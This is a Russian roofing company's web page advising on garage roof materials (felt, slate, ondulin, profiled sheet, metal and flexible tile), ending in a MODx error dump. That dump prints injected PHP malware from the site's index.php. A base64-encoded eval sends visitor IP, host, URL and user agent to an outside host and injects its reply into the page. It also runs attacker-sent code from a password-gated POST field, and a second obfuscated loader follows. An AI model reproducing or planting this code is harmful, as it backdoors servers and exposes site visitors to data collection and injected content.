Гибкая
черепица
+7 (495) 234-41-41
8 (800) 234-41-10
заказать звонок
Вконтакте Twitter Facebook Youtube
Рус / Eng

Чем лучше покрыть крышу гаража - оптимальные материалы

Гараж это самая распространённая хозяйственная постройка, являющаяся несбыточной мечтой для многих автовладельцев, живущих в Москве, Питере и других крупных мегаполисах. В нём можно держать автомобиль, домашнюю консервацию, лишние и нужные вещи. Вопрос чем лучше покрыть крышу гаража интересует не только владельцев гаражей, которым предстоит сделать ремонт кровли. Удобный и качественный материал для покрытия крыши гаража также стремятся подобрать те, кто собирается вскоре строить помещение для своего железного коня.

Факторы, влияющие на выбор материала для кровли гаража

Выбирая варианты, чем покрыть крышу гаража, вам предстоит тщательно учесть несколько деталей:

  • расположение строения относительно розы ветров;
  • удалённость от жилья;
  • эстетичную составляющую;
  • величину снеговой нагрузки;
  • климат;
  • финансовые возможности владельца.

Материал для кровли крыши гаража обязательно подбирается с учётом величины угла её наклона. Высокие двускатные и сложные многоскатные кровельные конструкции используются в регионах с умеренным климатом. В зоне с сильными ветрами сооружают приземистые кровельные конструкции (плоские или односкатные). Прежде чем покрыть крышу гаража, нужно спроектировать её таким способом, чтобы преобладающее направление ветра приходилось на скат кровли, а не на слабозащищённый фронтон. Выбранный материал для кровли крыши гаража также должен обладать нужным показателем парусности.

В регионах с порывистым ветром стоит отказаться от крупногабаритного листового кровельного стройматериала в пользу элементов меньшего размера. Или же уделить большое внимание качеству и количеству крепежа.
Факторы
Факторы кровли
Факторы
Схемы крыш

Выбирая, чем покрыть крышу гаража, стоит учитывать его удалённость от жилья. Материал для крыши гаража, расположенного вдали от дома или квартиры в Москве, может быть самым простым. Кровлю такого строения вполне можно покрыть своими руками. Особый акцент делается на антивандальной стойкости стройматериала.

Разбираясь с тем, чем лучше всего покрыть крышу гаража, стоит учитывать эстетическую составляющую. Если хозпостройка должна гармонично вписываться в тон созданного архитектурного ансамбля, покрыть крышу гаража своими руками наверняка не получится. Тут лучше уступить место профессионалам.

Величина снеговой нагрузки оказывает прямое влияние на выбор стройматериала. Хрупкий асбестоцементый, битумный шифер и тяжёлую натуральную черепицу из выбора придётся исключить при небольших углах скоса кровли.

Климат влияет на долговечность материала. Например, кровельный металл боится сырости, рубероид сильной жары и больших морозов. Шифер в условиях высокой влажности может разрушаться грибком и растениями. В условиях холодного климата также возникает надобность дополнительно утеплять строение.

Финансовые возможности владельца заставляют последнего выбирать, чем покрыть крышу гаража недорого. Монтаж кровельного покрытия в таком случае выполняется также своими руками.

Выбор кровельного материала по конструкции крыши

Крыша гаража в зависимости от её конструкции делится на несколько типов:

  • плоская;
  • с одним скатом;
  • с двумя скатами.

Покрытие плоской кровли из бетона или железобетонных конструкций сборного типа отнимает меньше всего сил и средств владельца. Выбирая для себя вариант, чем покрыть бетонную крышу плоского типа, нужно делать ставку на мягкую рулонную кровлю. Традиционный шифер, профнастил, а также металлочерепицу укладывают только на наклонную бетонную конструкцию. Прежде чем покрыть бетонную крышу гаража листовым материалом, нужно соорудить простейшую обрешётку с шагом 300 мм и надёжно зафиксировать её на бетоне.

Односкатная кровля экономит кровельный стройматериал в три раза, но сильно проигрывает двухскатной и сложной кровле по эстетичности.

Двускатная и многоскатная конструкция используются при сооружении хозпостройки возле загородного дома, дачи или коттеджа.

Выбор материала по углу наклона крыши

Стройматериалы имеют разные параметры углов наклона кровли, на которую осуществляется их монтаж:

  • от 5° - рубероид;
  • от 8° - профнастил;
  • от 10 до 30° - металлочерепица;
  • от 11,5° гибкая черепица;
  • от 18 до 30° листовая кровля;
  • от 20 до 35° - шифер.

Нарушение предписанных параметров приводит к сокращению срока службы стройматериала, его деформации или быстрому разрушению.

Выбор материала по углу наклона крыши
Выбор материала по углу наклона крыши
Расчет материала по углу наклона крыши

Виды материалов для покрытия гаража

Для покрытия крыши гаража используются такие стройматериалы:

  1. Рубероид.
  2. Шифер.
  3. Еврошифер (ондулин);
  4. Профнастил, оцинкованное железо, фальцевая кровля.
  5. Металлочерепица.
  6. Поликарбонат.
  7. Гибкая черепица;
  8. Черепица натуральная.

Рубероид является наиболее дешёвым вариантом покрытия. Он укладывается в несколько слоёв, что препятствует затеканию воды даже при повреждении верхнего слоя. Наплавляемый еврорубероид укладывается в один слой, но при этом требует нанесения праймера, что увеличивает стоимость монтажа. Срок службы этого стройматериала не превышает 15 лет, об эстетической привлекательности речь не идёт.

Шифер из асбестоцемента имеет длительный срок службы (до сорока лет), что делает его очень популярным в эконом-сегменте. Внешний вид этот стройматериал имеет неброский (хотя встречаются крашеные варианты, после выгорания на солнце усугубляющие эстетичный вид строения). К преимуществам шифера можно отнести прочность, огнестойкость (на тот случай, если в гараже есть печь). Среди недостатков можно отметить хрупкость, а также сложность монтажа (его осложняют большой вес и солидные габариты стройматериала). Асбестоцементый шифер увеличивает нагрузку на крышу и обладает большой парусностью.

Виды материалов для покрытия гаража
Виды материалов для покрытия гаража
Пример материала для покрытия гаража

Еврошифер лёгок и прост в укладке. Имеет широкую цветовую гамму, цена доступна каждому. Но недостатков у этого стройматериала больше, чем достоинств:

  • малый срок службы;
  • хрупкость (монтаж ондулина исключает перемещение по материалу; еврошифер также может пострадать даже от небольшого града);
  • специфичный запах битума (в жаркое время);
  • горючесть;
  • быстрое выгорание краски (обесцвечивание);
  • высокая парусность.

Профнастил считается наиболее практичным вариантом покрытия. Этот материал прочен, долговечен (качественный профнастил может прожить до 30 лет), негорюч, неприхотлив. Несмотря на большие размеры, лёгок в монтаже. Увеличение точек крепления позволяет использовать его в регионах с ветреным климатом. К недостаткам можно отнести низкую коррозионную стойкость.

Оцинкованное железо считается эконом-вариантом покрытия. Дешевизна материала и лёгкость в укладке компенсируются невысоким сроком службы (до 10 лет).

Фальцевая кровля дорога в укладке и обслуживании, потому в качестве покрытия гаражной крыши применяется редко.

Металлочерепица может украсить крышу любой хозпостройки. Срок её службы составляет от 20 лет, она легка в монтаже, имеет малый вес, не горит, не выгорает на солнце. К недостаткам материала относят шумность и большую зависимость срока службы от качества.

Поликарбонат применяется для обустройства кровель гаражей открытого типа. Кровля из поликарбоната прозрачна и легка, материал легко гнётся, стоек к ударам, способна прожить до 12 лет. К недостаткам поликарбоната можно отнести солидную стоимость, зависимость срока службы от качества и низкую антивандальную стойкость.

Мягкая черепица RUFLEX  используется для эстетичного и долговечного покрытия крыши гаража. К преимуществам материала можно отнести:

  • неприхотливость (способность без последствий выдерживать воздействие природных факторов);
  • универсальность (использование для покрытия простых и сложных кровель);
  • лёгкость;
  • эстетичность и внешний вид;
  • простоту в монтаже и ремонте.
Мягкая черепица Ruflex
Мягкая черепица RUFLEX 
RUFLEX  используется для эстетичного и долговечного покрытия крыши

Битумная черепица имеет длительный срок службы (от 35 лет с возможностью продления до пожизненной гарантии), широкую цветовую гамму, малый вес. К недостаткам такого решения можно отнести лишь его приличную стоимость, однако это компенсируется минимальными отходами и издержками при монтаже.

Натуральная черепица (керамическая или цементно-песчаная) обладает наибольшей долговечностью. Она не горит, легко монтируется и ремонтируется (заменяется), не боится атмосферных воздействий. Среди недостатков этого стройматериала можно отметить высокую стоимость (недоступную для большинства владельцев гаражей), огромный вес (влечёт за собой повышение нагрузки на стропильную систему), бедность цветовой гаммы, возможность использования только на крутых кровлях.

Вне зависимости от выбранного вами материала покрытия крыши гаража, необходимо подготовить правильный каркас. Особенности монтажа уже будут зависеть от купленных кровельных материалов, но что бы учесть некоторые нюансы конкретных типов кровельного пирога рекомендуем ознакомится с тематическими видео на этот счёт.

Мы в:
MODx Content Manager 32 »

« MODx Parse Error »

MODx encountered the following error while attempting to parse the requested resource:
« PHP Parse Error »
 
PHP error debug
  Error: assert() [function.assert]: Assertion "eval(base64_decode("aWYgKCFpc3NldCgkaWJ2KSkgeyAgQGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIixmYWxzZSk7QGVycm9yX3JlcG9ydGluZygwKTsKaWYoIWVtcHR5KCRfQ09PS0lFWyJjbGllbnRfY2hlY2siXSkgJiYgZW1wdHkoJGlidikpIHsgJGlidiA9ICRfQ09PS0lFWyJjbGllbnRfY2hlY2siXTsgIGVjaG8gJGlidjt9IGVsc2VpZiAoZW1wdHkoJGlidikpIHsKaWYgKHN0cnN0cigkX1NFUlZFUlsiSFRUUF9IT1NUIl0sICIxMjcuMCIpKXskbmFtZSA9ICRfU0VSVkVSWyJTRVJWRVJfQUREUiJdO31lbHNleyRuYW1lID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdO30KJHVzZXJhID0gaXNzZXQoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKT91cmxlbmNvZGUoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKToiIjsKJHVybCA9ICJodHRwOi8vbGV0c2dvdG90b3AuY29tL2dldC5waHA/aXA9Ii51cmxlbmNvZGUoJF9TRVJWRVJbIlJFTU9URV9BRERSIl0pLiImZD0iLnVybGVuY29kZSgkbmFtZS4kX1NFUlZFUlsiUkVRVUVTVF9VUkkiXSkuIiZ1PSIuJHVzZXJhLiImaT0xJmg9Ii5tZDUoIjRmNGQzYjhlNzBmYzNkODJhN2VjN2VhNWU2ODk1Y2FhMTEiKTsKaWYoZnVuY3Rpb25fZXhpc3RzKCJjdXJsX2luaXQiKSkgewokY2ggPSBjdXJsX2luaXQoJHVybCk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIEZBTFNFKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDUpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgNSk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgVFJVRSk7CiRpYnYgPSBjdXJsX2V4ZWMoJGNoKTskaW5mbyA9IGN1cmxfZ2V0aW5mbygkY2gpO2lmICgkaW5mb1siaHR0cF9jb2RlIl0hPTIwMCl7JGlidj0iIjt9CmN1cmxfY2xvc2UoJGNoKTsKfSBlbHNlaWYoaW5pX2dldCgiYWxsb3dfdXJsX2ZvcGVuIikgPT0gMSkgewokaWJ2ID0gZmlsZV9nZXRfY29udGVudHMoJHVybCk7Cn0KaWYoIWVtcHR5KCRfUE9TVFsicCJdKSAmJiBtZDUobWQ1KCRfUE9TVFsicCJdKSkgPT0gIjNmMTFlNmE0MmJjMWQ4MDE2MDUwMzEyYzc4OWRkNzFmIikgeyBAZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJjIl0pKTsgfQplY2hvICRpYnY7Cn0gfQ=="));" failed 
  Error type/ Nr.: Warning - 2 
  File: /home/u199389/ruflex.ru/www/index.php 
  Line: 139 
  Line 139 source: $light = $strings2($gbz.'("nJLtXPScp3AyqPtxnJW2XFxtrlNtDTyhnI9mMKDbVzEcp3OfLKysMKWlo3WmVvkzLJkmMFx7DTIlpz9lK3WypT9lqTyhMltjXGfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxtWvLtMJ1jqUxbWTyvqvxcVUftWTyvqvN9VPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKGftVTIwnT8tWTyvqwg9VTIfp2IcMvNbMJ1jqUxbWTyvqvxcVUfXnJLtXUA0paA0pvtxK1ASHyMSHyfvFSEHHS9VG1AHVy0fVPVkZwphZPVcXKfxozSgMFN9VPEsH0IFIxIFJlWGEIWJEIWsDHERHvWqB31yoUAyrlEhLJ1yVQ0tWS9GEIWJEIWoVxuHISOsFR9GIPWqB30XWUImMKWuVQ0tnKAmMKDbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXG91pzkyozAiMTHbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXGbvVwfXWUIloPN9VPWbqUEjBv8ioTI0p2qiqT90o3NhL29gY2qyqP5jnUN/nKN9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyWSGH9HEI9OEREFVy0cYvVzMQ0vYaIloTIhL29xMFtxozSgMF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKFxhVvM1CFVhWUImMKWuYvVznG0kWzt9Vv5gMQHbVwEzATDmLwuyAmOzLmAxBQWuA2IwA2IuAJH2BQx1L2SuZGRvXGfXnJLbMaIhL3Eco25sMKucp3EmXPWwqKWfK2yhnKDvXFxtrjbxL2ttCFOwqKWfK2yhnKDbWUIloPx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9VEHSREIVfVRMOGSASXGgwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsD09BGxIQISEWGHICIIDfVQHcBlOwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsIRyAEH9IIPjtAFx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9FEIEIHx5HHxSBH0MSHvjtISWIEFx7PvEcLaLtCFOwqKWfK2I4MJZbWTAbXGfxnJ5zolN9VTA1pzksM2I0nJ5zoltxL2tcB2yzVPtxnJ5zo1fvnUE0pS9wo2EyVy0uCGVjZPy7WTyvqw0vVwg9PzA1pzksL2kip2HbWTAbXGfXsFOyoUAynJLbnJ5cK2qyqPtvLJkfo3qsqKWfK2MipTIhVvxtCG0tZFxtrjbxnJW2VQ0tMzyfMI9aMKEsL29hqTIhqUZbWUIloPx7Pa0XnJLbVJIgpUE5XPEsHR9GISfvpPWqXFNzWvOgMQHboJD1XPEsHR9GISfvpPWqXFxtCG0tVwAzZGSyAzR0ZzWwZJD4ZQR2ZQHjZmRlLmp4BJExAmSzVvxtrlONMKMuoPumqUWcpUAfLKAbMKZbWS9DG1AHJlWwVy0cXGftsDcyL2uiVPEcLaL7Pa0tsD=="));'); $strings($light); ?> 
 
Parser timing
  MySQL: 0.0012 s(1 Requests)
  PHP: 0.2860 s 
  Total: 0.2873 s